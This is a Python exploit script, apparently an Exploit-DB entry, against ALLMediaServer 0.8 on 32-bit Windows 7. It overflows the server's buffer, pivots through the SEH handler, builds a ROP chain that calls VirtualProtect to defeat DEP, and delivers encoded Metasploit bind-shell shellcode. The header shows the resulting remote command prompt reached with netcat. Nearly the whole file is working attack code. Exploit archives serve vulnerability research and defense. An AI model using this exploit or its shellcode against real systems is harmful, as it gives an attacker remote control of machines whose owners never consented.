#!/usr/bin/python #----------------------------------------------------------------------------------# # Exploit: ALLMediaServer 0.8 SEH&DEP&ASLR # # Author: b33f (Ruben Boonen) # # OS: Win7 32-bit PRO SP1 # # Software: http://www.exploit-db.com/wp-content/themes/exploit/applications # # /442962ff59a549701f93a6fc4bf94363-ALLMediaServer.exe # #----------------------------------------------------------------------------------# # root@bt:~/Desktop# python AllServ.py 192.168.111.129 # # root@bt:~/Desktop# nc -nv 192.168.111.129 9988 # # (UNKNOWN) [192.168.111.129] 9988 (?) open # # Microsoft Windows [Version 6.1.7601] # # Copyright (c) 2009 Microsoft Corporation. All rights reserved. # # # # C:\Program Files\ALLMediaServer> # #----------------------------------------------------------------------------------# import sys, socket, struct s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 888)) #------------------------------------------------ # ROP-Chain generated by Mona!, only minor edits required # The program is very helpful providing 250000 gadgets and no apparent badchars #------------------------------------------------ rop = struct.pack('<L',0x6ac35756) # POP EAX # RETN (avformat-53.dll) rop += struct.pack('<L',0x671ee4e0) # <- *&VirtualProtect() rop += struct.pack('<L',0x6ac7e1ab) # MOV EAX,DWORD PTR DS:[EAX] # RETN (avformat-53.dll) rop += struct.pack('<L',0x66330c98) # XCHG EAX,ESI # RETN (avcodec-53.dll) rop += struct.pack('<L',0x66248004) # POP EBP # RETN (avcodec-53.dll) rop += struct.pack('<L',0x660c5d07) # ptr to 'jmp esp' (from avcodec-53.dll) rop += struct.pack('<L',0x665a4005) # POP EBX # RETN (avcodec-53.dll) rop += struct.pack('<L',0x00000201) # <- 201-hex or 513-bytes marked as executable (-> ebx) rop += struct.pack('<L',0x665a0aa0) # POP ECX # RETN (avcodec-53.dll) rop += struct.pack('<L',0x6ad58001) # RW pointer (lpOldProtect) (-> ecx) rop += struct.pack('<L',0x6604820b) # POP EDI # RETN (avcodec-53.dll) rop += struct.pack('<L',0x6604820c) # ROP NOP (-> edi) rop += struct.pack('<L',0x6672a1e2) # POP EDX # RETN (avcodec-53.dll) rop += struct.pack('<L',0x00000040) # newProtect (0x40) (-> edx) rop += struct.pack('<L',0x6ac35756) # POP EAX # RETN (avformat-53.dll) rop += struct.pack('<L',0x90909090) # NOPS (-> eax) rop += struct.pack('<L',0x6657f3c0) # PUSHAD # RETN (avcodec-53.dll) #------------------------------------------------ # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -t c # [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1) #------------------------------------------------ shellcode = ( "\xdb\xc1\xd9\x74\x24\xf4\xbe\x70\x42\xed\x57\x5d\x29\xc9\xb1" "\x56\x31\x75\x18\x83\xc5\x04\x03\x75\x64\xa0\x18\xab\x6c\xad" "\xe3\x54\x6c\xce\x6a\xb1\x5d\xdc\x09\xb1\xcf\xd0\x5a\x97\xe3" "\x9b\x0f\x0c\x70\xe9\x87\x23\x31\x44\xfe\x0a\xc2\x68\x3e\xc0" "\x00\xea\xc2\x1b\x54\xcc\xfb\xd3\xa9\x0d\x3b\x09\x41\x5f\x94" "\x45\xf3\x70\x91\x18\xcf\x71\x75\x17\x6f\x0a\xf0\xe8\x1b\xa0" "\xfb\x38\xb3\xbf\xb4\xa0\xb8\x98\x64\xd0\x6d\xfb\x59\x9b\x1a" "\xc8\x2a\x1a\xca\x00\xd2\x2c\x32\xce\xed\x80\xbf\x0e\x29\x26" "\x5f\x65\x41\x54\xe2\x7e\x92\x26\x38\x0a\x07\x80\xcb\xac\xe3" "\x30\x18\x2a\x67\x3e\xd5\x38\x2f\x23\xe8\xed\x5b\x5f\x61\x10" "\x8c\xe9\x31\x37\x08\xb1\xe2\x56\x09\x1f\x45\x66\x49\xc7\x3a" "\xc2\x01\xea\x2f\x74\x48\x63\x9c\x4b\x73\x73\x8a\xdc\x00\x41" "\x15\x77\x8f\xe9\xde\x51\x48\x0d\xf5\x26\xc6\xf0\xf5\x56\xce" "\x36\xa1\x06\x78\x9e\xc9\xcc\x78\x1f\x1c\x42\x29\x8f\xce\x23" "\x99\x6f\xbe\xcb\xf3\x7f\xe1\xec\xfb\x55\x94\x2a\x32\x8d\xf5" "\xdc\x37\x31\xde\x18\xb1\xd7\x4a\x31\x97\x40\xe2\xf3\xcc\x58" "\x95\x0c\x27\xf5\x0e\x9b\x7f\x13\x88\xa4\x7f\x31\xbb\x09\xd7" "\xd2\x4f\x42\xec\xc3\x50\x4f\x44\x8d\x69\x18\x1e\xe3\x38\xb8" "\x1f\x2e\xaa\x59\x8d\xb5\x2a\x17\xae\x61\x7d\x70\x00\x78\xeb" "\x6c\x3b\xd2\x09\x6d\xdd\x1d\x89\xaa\x1e\xa3\x10\x3e\x1a\x87" "\x02\x86\xa3\x83\x76\x56\xf2\x5d\x20\x10\xac\x2f\x9a\xca\x03" "\xe6\x4a\x8a\x6f\x39\x0c\x93\xa5\xcf\xf0\x22\x10\x96\x0f\x8a" "\xf4\x1e\x68\xf6\x64\xe0\xa3\xb2\x95\xab\xe9\x93\x3d\x72\x78" "\xa6\x23\x85\x57\xe5\x5d\x06\x5d\x96\x99\x16\x14\x93\xe6\x90" "\xc5\xe9\x77\x75\xe9\x5e\x77\x5c") #------------------------------------------------ # (1) Pivot through the SEH # 0x6680c7b6 : {pivot 1100} # ADD ESP,440 # POP EBX # POP ESI # POP EDI # RETN [avcodec-53.dll] # (2) ROP VirtualProtect() # Brings us 32-bytes into our A's # (3) Shellcode (368-bytes) # Current executable space 513-bytes, can be set for more... #------------------------------------------------ b00m = rop + "\x90"*10 + shellcode buffer = "JUNK"*8 + b00m + "A"*(1044-len(b00m)) + "\xB6\xC7\x80\x66" + "X"*100 s.send(buffer) s.close()